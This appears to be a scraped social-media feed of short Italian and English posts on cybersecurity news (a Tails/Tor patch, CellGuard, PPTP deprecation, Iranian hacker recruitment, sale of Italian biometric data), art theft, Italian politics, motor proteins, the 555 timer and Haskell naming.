Un’indagine tecnica ha evidenziato che gli Stati Uniti controllano i principali nodi di comunicazione di Internet, come i cavi sottomarini dell’Atlantico e del Pacifico, e operano con sette stazioni di monitoraggio globale del traffico dati. Queste operazioni avvengono spesso in collaborazione con il National Cyber Security Centre britannico, che analizza e intercetta i dati trasmessi attraverso tali cavi.
Obiettivi principali delle attività di spionaggio sarebbero paesi asiatici, dell’Europa orientale, dell’Africa e del Medio Oriente. Il rapporto afferma inoltre che oltre 50.000 strumenti di spionaggio sono stati impiantati in varie infrastrutture, con le principali città cinesi e università come la Northwestern Polytechnical University e il Centro di monitoraggio dei terremoti di Wuhan tra gli obiettivi primari.
Come sanno i nostri lettori, la Sezione 702 del FISA Emendament Act statunitense, avrebbe creato una rete di sorveglianza globale che include non solo paesi rivali, ma anche alleati e persino cittadini statunitensi. Il documento accusa inoltre aziende come Microsoft di collaborare strettamente con il governo e le agenzie di intelligence per promuovere la narrativa della “minaccia informatica cinese”, allo scopo di avanzare interessi commerciali e giustificare la sorveglianza indiscriminata.
L'articolo Cina vs USA e FISA 702. Gli hacker di Volt Typhoon è una “farsa politica” per screditare la Cina? proviene da il blog della sicurezza informatica.
Firenze. Recupero di opere d'arte per un valore di oltre tre milioni di euro da parte dei carabinieri del nucleo tutela patrimonio culturale e del FBI
Pagine del Manuale
Il recupero è avvenuto a seguito delle indagini iniziate nel 2021 dopo la denuncia di un furto presentata da un cittadino fiorentino al quale era stato sottratta da ignoti la “[b]De Historia Stirpium Commentarii Isignes”, manuale di botanica e medicina pubblicato a Basilea nel 1542 secondo gli studi del medico e botanico tedesco Leonhart Fuchs.
“Si tratta di un importante libro di botanica – riferisce il Maggiore Claudio Mauti, comandante del nucleo di Tutela Patrimonio Culturale dei carabinieri (TPC) di Firenze - che questa persona non ritrovava più nella sua collezione. Una ricerca che ci ha portato negli Usa perché a contatto con l'opera c'erano stati degli studiosi statunitensi risultati poi estranei ai fatti. Quindi nella nostra continua ricerca all'interno di aste online e vendite, abbiamo rintracciato l'opera che era finita nella disponibilità di un collezionista veneziano che non era a conoscenza dell'origine furtiva. Una ricerca che ci ha permesso di deferire 12 persone e alla quale ha collaborato l'Fbi”.
Tutto era cominciato nel 2018. Una famiglia benestante fiorentina assunto a lavorare un falegname fiorentino 50enne, il quale, lavori in corso, asportava via via dei libri di valore sostituendoli con altri di minore importanza.
Il falegname – per altro abile nel suo lavoro ufficiale – è stato poi assunto da altre famiglie proprietarie di lussuose dimore nobiliari. E qui sarebbe riuscito a mano a mano a portar via più di 600 opere che, sfruttando una rete di altre 11 persone costituita di commercianti e antiquari, riusciva a piazzar in tutto il mondo: Stati Uniti, Inghilterra, Emirati Arabi.
In un taccuino erano registrate le operazioni di vendita, che, ritrovato a seguito di una perquisizione, ha facilitato il lavoro degli investigatori.
Tra le opere rubate, numerose e pregevoli opere librarie, preziose ceramiche e vari dipinti, fra cui spiccano per importanza 4 piatti in ceramica bianca con decorazioni, recanti sul retro il timbro “Manifattura Ginori a doccia presso Firenze”, realizzate in esclusiva per la Presidenza della Repubblica italiana, un servizio in finissima porcellana con decorazioni in oro zecchino del 1820, un piatto della dinastia Ming tardo periodo Kangxi di fine XVII secolo, un dipinto raffigurante “bue” a firma Giovanni Fattori e l’opera libraria dal titolo “De Honesta Disciplina” con firma autografa di Giorgio Vasari.
Le opere saranno restituite ora ai proprietari, così come si tenterà di reimportarle altre, tramite il servizio Interpol, mediante azione stragiudiziale, per alcune legittimamente acquistate da ignari collezionisti stranieri.
@Notizie dall'Italia e dal mondo
#ArmadeiCarabinieri #TPC #FBI
Notizie dall'Italia e dal mondo reshared this.
La Marina italiana trasferisce il primo gruppo di migranti in Albania: polemica social tra Meloni e Sea Watch
@Politica interna, europea e internazionale
L’accordo sui migranti tra Italia e Albania diventa operativo: oggi, lunedì 14 ottobre, la nave Libra della Marina Militare italiana ha fatto rotta verso le coste albanesi con a bordo il primo gruppo di persone soccorse in acque
Politica interna, europea e internazionale reshared this.
Aggiorna Tails alla Svelta! Attacchi Attivi prendono il controllo del Browser TOR
Gli sviluppatori del sistema operativo anonimo Tails hanno rilasciato un aggiornamento di emergenza con il numero di serie 6.8.1, che elimina una grave vulnerabilità di sicurezza nel browser Tor.
La modifica principale è l’aggiornamento di Tor Browser alla versione 13.5.7, che risolve la vulnerabilità MFSA 2024-51 Use-After-Free.
Un bug di questo tipo consente all’aggressore di assumere il pieno controllo del browser e, secondo Mozilla, viene già sfruttato attivamente negli attacchi contro gli utenti Tor Browser.
L’aggiornamento a Tails 6.8.1 è disponibile tramite aggiornamento automatico a partire dalla versione 6.0 e successive. Se l’aggiornamento automatico non funziona o si verificano problemi nell’avvio di Tails, gli sviluppatori consigliano di aggiornare manualmente il sistema.
Puoi anche installare Tails 6.8.1 su una nuova unità USB. Per fare ciò, agli utenti vengono fornite istruzioni dettagliate per l’installazione tramite Windows, macOS, Linux o utilizzando la riga di comando su Debian e Ubuntu utilizzando GnuPG.
Allo stesso tempo, va ricordato che l’installazione su USB invece dell’aggiornamento comporterà la perdita di tutti i dati nella memoria permanente.
L'articolo Aggiorna Tails alla Svelta! Attacchi Attivi prendono il controllo del Browser TOR proviene da il blog della sicurezza informatica.
Calculating the True Per Part Cost for Injection Molding vs 3D Printing
At what point does it make sense to 3D print a part compared to opting for injection molding? The short answer is “it depends.” The medium-sized answer is, “it depends on some back-of-the-envelope calculations specific to your project.” That is what [Slant 3D} proposes in a recent video that you can view below. The executive summary is that injection molding is great for when you want to churn out lots of the same parts, but you have to amortize the mold(s), cover shipping and storage, and find a way to deal with unsold inventory. In a hypothetical scenario in the video, a simple plastic widget may appear to cost just 10 cents vs 70 cents for the 3D printed part, but with all intermediate steps added in, the injection molded widget is suddenly over twice as expensive.
In the even longer answer to the question, you would have to account for the flexibility of the 3D printing pipeline, as it can be used on-demand and in print farms across the globe, which opens up the possibility of reducing shipping and storage costs to almost nothing. On the other hand, once you have enough demand for an item (e.g., millions of copies), it becomes potentially significantly cheaper than 3D printing again. Ultimately, it really depends on what the customer’s needs are, what kind of volumes they are looking at, the type of product, and a thousand other questions.
For low-volume prototyping and production, 3D printing is generally the winner, but at what point in ramping up production does switching to an injection molded plastic part start making sense? This does obviously not even account for the physical differences between IM and FDM (or SLA) printed parts, which may also have repercussions when switching. Clearly, this is not a question you want to flunk when it concerns a business that you are running. And of course, you should bear in mind that these numbers are put forth by a 3D printing company, so at the scale where molding becomes a reasonabe option, you’ll also want to do your own research.
While people make entire careers out of injection molding, you can do it yourself in small batches. You can even use your 3D printer in the process. If you try injection molding on your own, or with a professional service, be sure to do your homework and learn what you can to avoid making costly mistakes.
youtube.com/embed/qhxlT4hIm94?…
The Biological Motors That Power Our Bodies
Most of us will probably be able to recall at least vaguely that a molecule called ATP is essential for making our bodies move, but this molecule is only a small part of a much larger system. Although we usually aren’t aware of it, our bodies consist of a massive collection of biological motors and related structures, which enable our muscles to contract, nutrients and fluids to move around, and our cells to divide and prosper. Within the biochemical soup that makes up single- and multi-cellular lifeforms, it are these mechanisms that turn a gooey soup into something that can do much more than just gently slosh around in primordial puddles.
There are many similarities between a single-cell organism like a bacteria and eukaryotic multi-cellular organisms like us humans, but the transition to the latter requires significantly more complicated structures. An example for this are cilia, which together with motor proteins like myosin and kinesin form the foundations of our body’s basic functioning. Quite literally supporting all this is the cytoskeleton, which is a feature that our eukaryotic cells have in common with bacteria and archaea, except that eukaryotic cytoskeletons are significantly more complex.
The Cytoskeleton
Image of the mitotic spindle in a human cell showing microtubules in green, chromosomes (DNA) in blue, and kinetochores in red. “Kinetochore” by [Afunguy].We mammals have a skeleton to keep our bodies from collapsing into a sad, soggy pile, so too do our cells have their own skeleton, giving them shape and rigidity, as well as providing motor proteins something to interact with. The cytoskeleton in eukaryotes consists of mainly microfilaments, intermediate filaments and microtubules, with prokaryotes having their own distinct cytoskeleton structures. Of the three types that make up the eukaryotic cytoskeleton, the microfilament and microtubules are used by motor proteins. These thus fall into two categories: actin motors (using the actin-based microfilaments) and microtubule motors.
Although muscles are an obvious example of motor proteins in action, even something as fundamental as cell division (mitosis) involves motor proteins, specifically kinesin microtubule motors. Starting from a centrosome (microtubule organizing center), microtubules are formed from tubulin to create the scaffolding for the kinesin proteins to move across, which then move the two centrosomes (one newly formed) to opposite sides of the cell undergoing mitosis. What drives the actual separation of the duplicated chromosomes (chromatids) are the kinetochores. These kinetochore proteins are microtubule-binding structures that form not only the linkage between the chromatids and a centromere, they also create the mitotic spindle, and which use ATP to ‘crawl’ along the microtubules thanks to their microtubule-binding dynein and kinesin motor proteins. This is what pulls the chromatids apart, allowing mitosis to continue and eventually end up with two sets of DNA within one cell.
“Organization of Muscle Fiber” by [OpenStax]The motor proteins that create muscle cells do not use microtubules, but rather the actin-based microfilaments. Within mammalian species, there are about 40 different types of these myosin motor proteins. The protein myosin II is the one that is part of muscle cells, but it also serves an essential function with mitosis, specifically after the completion of mitosis, when the cytokinesis stage commences. During this an actin-myosin ring is assembled around the cell, along which myosin II proteins can move. Powered by ATP, these motor proteins constrict the cell, pinching it until one cell becomes two, each with its own copy of the original cell’s DNA.
In the case of muscle cells, these are rather unique in this regard, as some of them are multinucleated cells, formed through the fusion of individual cells (a synctium). Mammalian muscle tissues come in three broad categories: smooth, cardiac and skeletal muscle tissue, each of which have distinct properties. Of these skeletal muscle tissue is composed of synctium cells, which form long tubular cells, inside of which are many myofibril organelles. These myofibrils consist of myofilaments, each of which can be a thick, thin or elastic type.
The thick filaments are myosin II proteins, the thin filaments are actin proteins and the elastic filaments (titin-based), which provides support and guidance to the thick and thin filaments. Muscle contraction is thus accomplished by the myosin II filaments binding to the actin and moving across it, powered by the ATP from the mitochondria (the powerhouses of the cell). This shortens the myofibril and thus the muscle. Relaxation of the muscle involves the enzyme acetylcholinesterase, which breaks down the neurotransmitter acetylcholine, which originally excited the muscle fiber membrane’s receptors.
Protein Power
Often referred to as ‘cellular currency’, ATP (adenosine triphosphate) and GTP (guanosine triphosphate) are both nucleoside triphosphates, which are an essential precursor to RNA and DNA in addition to being involved in signaling pathways, and the aforementioned energy currency. These nucleosides are generally synthesized inside cells, in the case of ATP using mechanisms like photosynthesis and cellular respiration. While ATP is the most important energy carrier within the cell, GTP is important in DNA transcription and microtubule polymerization, making its use more specialized.The cycle of ATP and ADP.
The energy of ATP and GDP is released through hydrolysis, which produces ADP and GDP, respectively, along with a free inorganic phosphate ion (Pi). This releases about 20.5 kilojoules per mole, with the hydrolyzed molecules being ‘recharged’ to produce new ATP and GTP, in a continuous cycle.
For hydrolysis of ATP, the enzyme ATPase has to be present. In the case of e.g. muscle tissue, the ATP will bind to the myosin II proteins, which subsequently gets hydrolyzed by the ATPase, turning it into ADP and Pi. This process forms cross-bridges between the myosin II and actin, which induces movement of the former along the latter, and releasing the ADP and Pi. This is followed by a fresh ATP binding to the myosin II, preparing it for the next power stroke. For different motor proteins a similar process enables a similar process of events, which can continue for as long as it is mechanically possible, fresh ATP (or GTP) is available and an impetus (e.g. neurotransmitter binding to a receptor) is present.
Cilia
“Eukaryotic cilium diagram” by [LadyofHats]Perhaps one of the most fascinating motor proteins are those that are part of flagella and cilia. Here the bacterial flagellum is quite different from the eukaryotic one, being powered by a proton gradient motor, and also different from the archaeal flagella. Meanwhile the eukaryotic flagella and cilia are quite similar, with the distinction being mostly academic. Both consist of nine microtubules with a pair of dynein motor proteins per doublet microtubule that use ATP hydrolysis to provide motion. The only exception here are the non-motile cilia, which lack the dynein.
Dynein motor proteins move along microtubules, which makes their presence in these flagella and cilia rather logical. These motile cilia and flagella are found throughout the body, with the respiratory epithelial cells found throughout the inside of the respiratory tract providing the essential function of mucociliary clearance, and similar motile cilia moving cerebrospinal fluid inside the brain, as well as egg cells from the oviducts (fallopian tubes) to the uterus .
Meanwhile the version found on sperm cells which provide them with the ability to propel themselves are generally called flagella. This version is longer and has a different undulating motion than the motile cilia described earlier, but still has the same basic structure. As said earlier, eukaryotic flagella and cilia are effectively the same, which has led to considerable confusion and debate in the past.
A Wonder Of Evolution
In this article we touched only upon a fraction of the sheer complexity of all the details which make a body like that of ours work (somewhat) perfectly on a daily basis. Beyond the essentials covered on e.g. Wikipedia, there are the in-depth reference books, with the student reference work Biochemistry(8th edition Archive link) by Jeremy M. Berg and colleagues my current go-to refresher on just about anything to do with biochemical systems.
It should come as no surprise that with the sheer complexity of the field of biochemistry, even something as relatively straightforward as motor proteins would lead to significant confusion. This was quite obvious in a recent video on the Smarter Every Day YouTube channel, where the differences between bacterial and eukaryotic flagella got mixed up severely, which was perhaps somewhat ironic for a science channel that is run by a person with rather strong opinions on ‘intelligent design’ (ID).
The complexity of biological motors is often pointed to by ID proponents as some kind of evidence of ‘irreducible complexity’, yet across the bacterial, archaeal and eukaryotic domains we can see the same problems being solved repeatedly in three very distinct fashions. This shows quite clearly the marvel of evolution, and how this process over millions of years can turn even the most complex problem into a logical series of steps once you get the right chemicals together.
Once the chemistry had some time to turn into proper biochemistry with the evolutionary survival process mercilessly picking off the attempts that weren’t quite good enough, and before you know it you have us primates marveling at at said biochemistry. As they say, life finds a way.
Featured image: “Flagellar Motor Assembly” by [PKS615].
Caso Ruby Ter, la Cassazione annulla 23 assoluzioni: “Bisogna fare il processo d’appello”
@Politica interna, europea e internazionale
La sesta sezione della Corte di Cassazione ha annullato la sentenza di assoluzione per 23 imputati del processo Ruby Ter. I giudici di legittimità hanno stabilito che si dovrà tenere un processo d’appello a Milano nei loro confronti per il reato di corruzione
Politica interna, europea e internazionale reshared this.
Ministero dell'Istruzione
#ITS, il Ministro Giuseppe Valditara ha partecipato questa mattina a Milano all’evento per celebrare i 10 anni di attività di ITS Academy Innovaprofessioni e all’inaugurazione dei primi due laboratori del gruppo Kering per l’alta formazione nel setto…Telegram
Giovanni Malagodi, la politica come servizio
@Politica interna, europea e internazionale
Nacque a Londra, visse a Berlino, Parigi, Buenos Aires, Roma e Milano. Conobbe il mondo e dal mondo fu conosciuto e stimato. Discusse la tesi di laurea con il padre della politologia italiana, Gaetano Mosca; la pubblicò grazie all’interessamento di Benedetto Croce. Fu protagonista del salvataggio della Banca
Politica interna, europea e internazionale reshared this.
Fake BTS sotto tiro! I ricercatori sviluppano CellGuard per proteggere il tuo iPhone
Gli scienziati del laboratorio SEEMOO hanno sviluppato un’applicazione chiamata CellGuard, unica nel suo genere, che aiuta a rilevare attività sospette delle reti cellulari e identificare gli attacchi mirati all’iPhone.
L’obiettivo principale di CellGuard è identificare stazioni base false che possono essere utilizzate dagli aggressori per tracciare la posizione, intercettare il traffico e altri attacchi ai dispositivi mobili.
Una Fake BTS (RBS) è una torre cellulare malevola che induce un dispositivo a connettersi ad esso.
Tali stazioni sono particolarmente vulnerabili nelle reti 2G, dove non esiste alcun controllo della connessione, come nel caso delle reti Wi-Fi aperte. Per proteggerti, gli esperti consigliano di disattivare il 2G sul tuo iPhone in modalità di blocco
CellGuard analizza i pacchetti inviati tra la stazione base e il dispositivo utilizzando diversi parametri chiave. Questi includono il controllo della torre rispetto al database Apple Location Services (ALS), l’analisi della distanza tra l’utente e la torre e l’analisi della frequenza, della larghezza di banda e della potenza del segnale. Questi indicatori permettono di individuare eventuali anomalie e individuare torri sospette.
Tuttavia, gli sviluppatori sottolineano che molti avvisi potrebbero essere falsi allarmi dovuti a legittime anomalie della rete. Ad esempio, le nuove stazioni radio base potrebbero non apparire immediatamente nel database di Apple e, in condizioni di traffico elevato, alcune torri riducono deliberatamente la capacità. Anche la potenza del segnale può variare a seconda delle condizioni.
Nonostante la possibilità di falsi positivi, CellGuard rimane uno strumento affidabile per identificare potenziali minacce. L’applicazione è attualmente in fase di beta testing e i suoi sviluppatori invitano tutti a provare la nuova tecnologia installandola sul proprio iPhone, anche in modalità bloccata.
CellGuard rappresenta un passo importante verso la protezione degli utenti da potenziali minacce provenienti da stazioni radio base non autorizzate, sebbene la probabilità di tali attacchi rimanga bassa. Gli utenti possono adottare semplici misure come l’attivazione della modalità aereo per ridurre al minimo i rischi.
L'articolo Fake BTS sotto tiro! I ricercatori sviluppano CellGuard per proteggere il tuo iPhone proviene da il blog della sicurezza informatica.
CGUE: Meta deve "minimizzare" l'uso dei dati personali per gli annunci pubblicitari
Con la sentenza odierna nella causa C-446/21 (Schrems contro Meta), la Corte di giustizia dell'Unione europea (CGUE) ha dato pieno appoggio a una causa intentata contro Meta per il suo servizio Facebook.
mickey04 October 2024
Vi racconto vecchi e nuovi problemi di Unifil. L’opinione di Del Monte
@Notizie dall'Italia e dal mondo
[quote]Il fatto che il primo ministro israeliano, Benjamin Netanyahu, dica che la missione internazionale Unifil sia anch’essa uno “scudo umano” di Hezbollah, pone, come giustamente ha scritto su X anche il professor Germano Dottori, un dilemma: andarsene o farsi travolgere dalla guerra? Perché le azioni di
Notizie dall'Italia e dal mondo reshared this.
Microsoft Fa Pulizia! Addio a PPTP e L2TP, La Nuova Era delle VPN è Arrivata
Microsoft non supporterà più il protocollo PPTP (Point-to-Point Tunneling Protocol) e il protocollo L2TP (Layer 2 Tunneling Protocol) nelle versioni future di Windows Server. L’azienda consiglia agli amministratori di passare ad altri protocolli che garantiscano la sicurezza.
Da oltre 20 anni le aziende utilizzano i protocolli VPN PPTP e L2TP per fornire accesso remoto alle reti aziendali e ai server Windows. Tuttavia, nel corso del tempo, gli attacchi sono diventati più sofisticati e potenti e questi protocolli sono diventati meno sicuri.
Ad esempio, PPTP è vulnerabile agli attacchi di forza bruta offline che utilizzano hash di autenticazione intercettati e L2TP non fornisce crittografia se non utilizzato insieme a un altro protocollo come IPsec. Inoltre, se la combinazione L2TP e IPsec è configurata in modo errato, ciò può aprire la porta agli attacchi.
Di conseguenza, gli sviluppatori Microsoft hanno deciso di abbandonare in futuro il supporto per PPTP e L2TP.
“Questa mossa fa parte della strategia di Microsoft volta a migliorare la sicurezza e la produttività migrando gli utenti verso protocolli più sicuri come Secure Socket Tunneling Protocol (SSTP) e Internet Key Exchange versione 2 (IKEv2)”, ha affermato la società. “Questi protocolli moderni forniscono una migliore crittografia, velocità di connessione più elevate e affidabilità, rendendoli più adatti agli ambienti di rete sempre più complessi di oggi.”
Nella loro pubblicazione i rappresentanti di Microsoft elencano i seguenti vantaggi dei protocolli citati.
SSTP:
- crittografia avanzata: il protocollo utilizza la crittografia SSL/TLS, fornendo un canale di comunicazione sicuro;
- Bypass del firewall – SSTP può facilmente passare attraverso la maggior parte dei firewall e proxy, garantendo connessioni ininterrotte;
- Facilità d’uso: grazie al supporto integrato in Windows, SSTP è facile da configurare e distribuire.
IKEv2:
- maggiore sicurezza: IKEv2 supporta algoritmi di crittografia e metodi di autenticazione avanzati;
- mobilità e multihoming: il protocollo è particolarmente efficace per gli utenti mobili, mantenendo una connessione VPN quando si cambia rete;
- Prestazioni migliorate: con una creazione del tunnel più rapida e una latenza inferiore, IKEv2 offre prestazioni più elevate (rispetto ai protocolli legacy).
Microsoft sottolinea che quando una funzionalità diventa obsoleta, ciò non significa che verrà immediatamente rimossa ovunque. Sì, non è più in fase di sviluppo attivo e potrebbe essere rimosso dalle versioni future di Windows, ma questo periodo potrebbe durare da diversi mesi a diversi anni. Cioè, gli amministratori avranno tempo per trovare alternative.
È stato riferito che le versioni future di Windows RRAS Server (server VPN) non accetteranno più connessioni in entrata utilizzando i protocolli PPTP e L2TP. Tuttavia, gli utenti potranno comunque creare connessioni PPTP e L2TP in uscita.
L'articolo Microsoft Fa Pulizia! Addio a PPTP e L2TP, La Nuova Era delle VPN è Arrivata proviene da il blog della sicurezza informatica.
Using the 555 for Everything
The 555 timer is one of the most versatile integrated circuits available. It can generate PWM signals, tones, and single-shot pulses. You can even put one in a bi-stable mode similar to a flip flop. All of these modes are available by only changing a few components outside of the IC itself. It’s also dirt cheap, so it finds its way into all kinds of applications its original inventors never imagined. There’s a bit of a trope around here as well that you ought not to use a microcontroller when one of these will do, and while it’s a bit of a played-out comment, it’s often more true than it seems. This video shows a few uncommon ways of using these circuits instead of putting a microcontroller to work.
After a brief overview of the internals of the hallowed 555, [Doctor Volt] walks us through some of its uses, starting with applications for digital inputs, including a debounce circuit and a toggle switch. From there, he moves on to demonstrating a circuit that can protect batteries from deep discharge, and a small change to that circuit can turn the 555 into a resetting fuse that can protect against short circuit events. Finally, the PWM capabilities of this small integrated circuit are put to work as an audio amplifier, although perhaps not one that would pass muster for the most devout audiophiles among us.
Even though it’s possible to offload a lot of the capabilities of a 555 onto a microcontroller, there’s certainly an opportunity to offload some things to the 555, even if your project still needs a microcontroller. However, offloading tasks like debounce or input latching to hardware rather than spending microcontroller cycles or pins can make a project more robust, both from reliability and software points of view. For some other useful circuits, some of which have been forgotten in the modern microcontroller age, it’s worth taking a look at some of these antique circuit books as well. While we are sure the 555 designers hoped it would be a big hit, no one imagined this giant one.
youtube.com/embed/sgTh5qMiqoo?…
Cercasi Hacker Governativi! Come l’Iran Recluta Tramite le CTF i Sostenitori Digitali del Regime
L’Accademia iraniana si è rivelata una copertura per ricostituire i ranghi della cyber intelligence. La Raavin Academy, che forma ufficialmente sulla sicurezza informatica, in realtà recluta hacker per lavorare per il Ministero dell’intelligence iraniano. La pubblicazione Iran International ha parlato delle figure chiave di un gruppo di hacker governativi iraniani.
Due anni fa, quando iniziarono le proteste di massa in Iran, gli hacker governativi aiutarono a identificare e reprimere i manifestanti. Nel novembre 2022, il Ministero degli Esteri americano ha imposto sanzioni alla Raavin Academy per la partecipazione dei suoi dipendenti alla repressione. Successivamente, in un rapporto del Consiglio per i diritti umani delle Nazioni Unite, l’Accademia è stata nominata come uno dei partecipanti alle violazioni dei diritti umani in Iran.
Nuove informazioni rivelano che sotto la maschera di un’accademia informatica, gli hacker vengono reclutati per lavorare per il Ministero dell’Intelligence. Il processo di reclutamento si maschera da “Olimpiadi tecnologiche”, organizzate dal dipartimento scientifico dell’amministrazione presidenziale e dal parco tecnologico. Il concorso seleziona gli specialisti più promettenti per diventare “hacker amichevoli” che lavorano nell’interesse del Paese.
La storia dell’accademia inizia nel 2019, quando due giovani dipendenti del Ministero dell’Intelligence registrano un’organizzazione no-profit “Avai Houshmand Ravin”. Lo scopo ufficiale dell’NPO era la formazione sulla sicurezza informatica, ma in realtà l’accademia è diventata un centro di formazione per hacker a supporto delle attività dei servizi di intelligence iraniani.
Iran International ha ottenuto informazioni su 16 dipendenti chiave dell’accademia, che agiscono sotto le spoglie di insegnanti e membri del consiglio. I lavoratori sono coinvolti nel riciclaggio di denaro e nel reclutamento di nuovi membri di bande.
I leader dell’accademia sono agenti della Repubblica islamica, impegnati nella pirateria informatica e nel reclutamento di personale per il regime.
Ora non si tratta più di individui anonimi con pseudonimi, ma di personaggi noti associati all’Accademia del Ministero dell’Intelligence e al servizio degli scopi del governo. Gruppi di hacker associati alla Raavin Academy hanno effettuato attacchi informatici contro sistemi in Italia, Algeria, Giordania, Turchia, Arabia Saudita, Iraq e Pakistan.
L'articolo Cercasi Hacker Governativi! Come l’Iran Recluta Tramite le CTF i Sostenitori Digitali del Regime proviene da il blog della sicurezza informatica.
Braccio982 likes this.
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
Ministero dell'Istruzione
#NotiziePerLaScuola È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.Telegram
Whispers from the Dark Web Cave. Cyberthreats in the Middle East
The Kaspersky Digital Footprint Intelligence team analyzed cybersecurity threats coming from dark web cybercriminals who targeted businesses and governments in the Middle East in H1 2024. Our research highlights the most severe and pervasive threats, and identifies potential risks and consequences as well as defensive strategies.
The report covers threats that targeted entities in the following countries and territories:
- Bahrain;
- Egypt;
- Iraq;
- Jordan;
- Kuwait;
- Lebanon;
- Oman;
- Palestine;
- Qatar;
- Saudi Arabia;
- Syria;
- United Arab Emirates.
The five prevalent cybersecurity threats in the Middle East covered in the report are related to:
- The activities of ideological pirates, or hacktivists. The region has seen exponential growth in these due to the current geopolitical situation, and they are getting ever more destructive.
- The shadow jewelry fair, or the initial access broker market. Initial access brokers deal in attack entry points for corporate networks, which attract hackers and cybercrime gangs.
- Deadly sandworms, or ransomware gangs. At least 19 gangs were active in the Middle East in H1 2024, conducting multiple ransomware attacks that typically led to devastating consequences.
- The ubiquity of malicious whistleblowers, or information stealers. They provide adversaries with up-to-date data for future attacks, especially valid credentials for corporate systems. Almost 10 million lines of stolen credentials belonging to Middle Eastern entities were published on the dark web in H1 2024 alone. The figure includes 4.4 million lines of access information stolen from key government agencies.
- Cave raiders who steal sensitive data from corporations and other targets and distribute it among cybercriminals. A quarter of all data breaches affect various government organizations.
Staying aware of all possible risks coming from the dark web helps organizations and governments to be one step ahead of cybercriminals and thus, to prevent attacks or fraud that could compromise their network infrastructure or operational integrity.
Out report will be beneficial for:
- C-level managers;
- Corporate security employees;
- Risk management professionals;
- Cyberthreat Intelligence (CTI) and SOC analysts;
- Incident response professionals;
- OSINT and darknet researchers.
The full version of the report is available on Kaspersky Digital Footprint Intelligence website.
@ new version 0.1.0-beta08 released! 🚀🦝🚀
Changelog:
- several improvements to list formatting and insertion, now even ordered lists are supported;
- default opening mode for group accounts is now forum mode by default, but you can opt-out in settings and go back to the previous behaviour;
- several improvements in the profile screen (e.g. scroll is retained across navigations), logging and account switch use cases have been improved as well;
- fix vertical scroll in settings screen;
- add empty message in user list;
- fix spoilers closing immediately after opening;
- added French and Spanish l10ns;
- added more unit tests;
- several dependency updates, migration to Kotlin 2.0.21.
Please let me know your opinions and feedback, in the meantime have a great week! #livefasteattrash 🦝🦝🦝
#friendica #friendicadev #androidapp #androiddev #mobileapp #fediverseapp #kotlin #kmp #compose #cmp #opensource #foss
reshared this
Alphabet Soup: Haskell’s Single-Letter Naming Quirks
When you used punch cards or tape to write a computer program, brief variable names were the norm. Your compiler or assembler probably only allowed six letters, anyway. But times change, and people who, by habit, give array indices variable names like I, J, or K get a lot of grief. But [Jack Kelly] points out that for highly polymorphic languages like Haskell, you often don’t know what that variable represents anyway. So how are you supposed to name it? He provides a guide to one-letter variable names commonly used by Haskell developers and, sometimes, others.
Haskell’s conventions are particularly interesting, especially with i, j, and k, which are borrowed from mathematical tradition to signify indices or integers and passed on via Fortran. The article also highlights how m often refers to Monads and Monoidal values, while t can represent both traversables and text values. Perhaps more obscurely, p can denote profunctors and predicates, giving a glimpse into Haskell’s complex yet efficient type system. These naming conventions are not formal standards but have evolved into a grass-roots lexicon.
Of course, you can go too far. We see a lot of interesting and strange things written in Haskell, including this OpenSCAD competitor.
Il cyber criminale Miano come ha ottenuto il bottino di 6 milioni di euro?
@Informatica (Italy e non Italy 😁)
Leggendo le 175 pagine dell’ordinanza di arresto con cui il Procuratore della Repubblica di Napoli Nicola Gratteri e i Pubblici Ministeri hanno chiesto l’arresto di Carmelo Miano, abbiamo più volte pensato ma ‘davvero ha usato le sue eccezionali capacità di criminale
Informatica (Italy e non Italy 😁) reshared this.
GAZA. Decine di morti e feriti per i bombardamenti. Nel nord da giorni non entrano aiuti
@Notizie dall'Italia e dal mondo
Torna lo spettro della fame nella zona settentrionale al centro di una nuova offensiva militare. Ieri 4 soldati israeliani uccisi da un drone di Hezbollah
L'articolo GAZA. Decine di morti e feriti per i bombardamenti. Nel nord da
Notizie dall'Italia e dal mondo reshared this.
Dati Biometrici degli Italiani in Vendita per 5 euro! Il Mercato Nero a Prezzi da Black Friday
Un inquietante annuncio è apparso su un noto forum underground russo venerdì scorso, dove un utente offre in vendita 4.500 documenti contenenti dati biometrici per soli 5 euro l’uno.
L’annuncio nel forum underground russo
Nelle consuete attività svolte dal gruppo DarkLab di analisi delle underground, è stato rilevato venerdì sera un post che mette in vendita foto e video di volti, con due fotografie (una in primo piano e una da lontano), e un video con la testa girata da un lato all’altro per le necessarie verifiche biometriche.
Il prezzo estremamente basso di 5 euro per un documento di tale sensibilità è preoccupante.
Non si tratta di semplici dati anagrafici, ma di informazioni biometriche che possono essere usate per falsificare identità, accedere a sistemi di sicurezza avanzati e compiere una vasta gamma di attività criminali, come truffe finanziarie, furti di identità e persino falsificazioni di passaporti o documenti ufficiali.
Le potenziali conseguenze delle truffe biometriche
L’accesso ai dati biometrici come quelli offerti in questo annuncio può portare a diverse tipologie di crimini e frodi. Tra i rischi maggiori troviamo:
- Furto d’identità: Utilizzando i dati biometrici, i criminali possono accedere a conti bancari, ottenere crediti o persino perpetrare truffe online spacciandosi per altre persone.
- Clonazione di documenti: I dati biometrici possono essere utilizzati per creare documenti falsi che superano i controlli biometrici in aeroporti e banche, compromettendo gravemente la sicurezza nazionale.
- Accesso a dati sensibili: Le tecnologie di riconoscimento facciale e i sistemi di verifica che utilizzano dati biometrici sono sempre più diffusi; disporre di queste informazioni consente di violare questi sistemi, mettendo a rischio informazioni personali e aziendali.
Prezzo basso, rischio alto
Il fatto che questi dati biometrici vengano venduti a soli 5 euro l’uno dimostra quanto il mercato illegale li sottovaluti, ma soprattutto quanto sia accessibile e pericoloso il loro utilizzo. Una volta venduti e utilizzati, non c’è modo di sapere a chi andranno e per quale scopo verranno sfruttati.
Tutte le organizzazioni che gestiscono dati biometrici dovrebbero basare il proprio modello di business su una solida postura di sicurezza informatica, soprattutto alla luce del crescente numero di minacce informatiche. La vulnerabilità di queste informazioni, come evidenziato dal recente caso di documenti biometrici italiani messi in vendita su forum underground, può avere conseguenze disastrose se non adeguatamente protetta. La protezione dei dati sensibili, come quelli biometrici, richiede un approccio proattivo e aggiornato per prevenire fughe di informazioni e proteggere la privacy degli utenti.
L'articolo Dati Biometrici degli Italiani in Vendita per 5 euro! Il Mercato Nero a Prezzi da Black Friday proviene da il blog della sicurezza informatica.
Dall’Olivetti al Nulla: L’Italia che Vive di Nostalgia e ha Perso la Bussola per l’Innovazione
L’Italia, è sempre stata terra di ingegno e creatività.
